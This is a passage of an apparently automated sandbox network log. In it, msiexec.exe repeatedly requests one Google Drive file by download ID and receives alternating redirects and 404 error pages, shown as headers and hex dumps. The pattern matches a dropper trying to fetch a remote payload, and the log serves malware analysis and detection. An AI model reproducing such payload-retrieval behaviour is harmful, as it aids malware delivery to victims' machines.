Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49719	142.250.181.1	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:14 UTC	460	OUT	GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:15 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:14 GMT Content-Security-Policy: script-src 'nonce-V5Ij825rmG2bwoh83j-dNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC446h0B54JEKRl6s_XXFGV2nxauNGZgaI2Past7Bhj_e71JAiseBFgNJPtSM-tYnulggu5z_hNrHA Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:44:15 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 54 66 34 71 55 33 7a 63 57 57 4c 49 5a 53 78 4e 76 6f 4b 63 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eTf4qU3zcWWLIZSxNvoKcg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49720	172.217.19.174	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:17 UTC	418	OUT	GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:17 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:17 GMT Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-Wn2iPG0EvXutY33bFqzbdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49721	142.250.181.1	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:19 UTC	460	OUT	GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:20 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:20 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-rlOwPRkDZBH0TkiNGCdZtw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 X-GUploader-UploadID: AFiumC4cghIbPf3v61Nm6YOYT51i1FWU0xnwAdgZco3ZcxE6ALyNXzd4yvSzToemjc3PPQrb-FvG32cYmQ Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:44:20 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 47 4d 52 50 76 48 6e 69 75 48 61 5a 4b 4b 68 48 78 75 64 55 59 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GMRPvHniuHaZKKhHxudUYw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49723	172.217.19.174	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:22 UTC	418	OUT	GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:23 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:23 GMT Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-_dxqKyZDWyfXS-DnfI5MMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49725	142.250.181.1	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:25 UTC	460	OUT	GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:26 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:25 GMT Content-Security-Policy: script-src 'nonce-MmCWXCiBn911DADyFXUfwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC54h9p9IrBpDuPfnACo7yUfpSsxQZL_qcJgTpO7yZtlqm-MKYBc2wItF4ucy4Z2P60eWml95GXazg Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:44:26 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 73 4c 49 63 54 63 69 4f 7a 52 61 31 32 46 38 72 68 69 6a 53 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1sLIcTciOzRa12F8rhijSQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.9	49726	172.217.19.174	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:28 UTC	418	OUT	GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:29 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:28 GMT Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-nk68NQvqjrTrFiV2ybweRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.9	49727	142.250.181.1	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:30 UTC	460	OUT	GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:31 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:31 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-7gmziVAhN04C73TTRS4UVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC6WpkrE1dTEJUYvrf3F0J3AHqplaTy679_MyfYxo0DYzRanxSZBBHU8M16l-NY47OEHfaNdnkxraA Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 15:44:31 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 74 7a 58 4c 75 51 31 54 4c 35 49 33 58 6e 61 35 77 39 51 41 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xtzXLuQ1TL5I3Xna5w9QAA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.9	49728	172.217.19.174	443	4516	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 15:44:33 UTC	418	OUT	GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
2024-12-03 15:44:34 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 15:44:34 GMT Location: https://drive.usercontent.google.com/download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-R6S6-Y38-DvaXLU5IVXljQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: 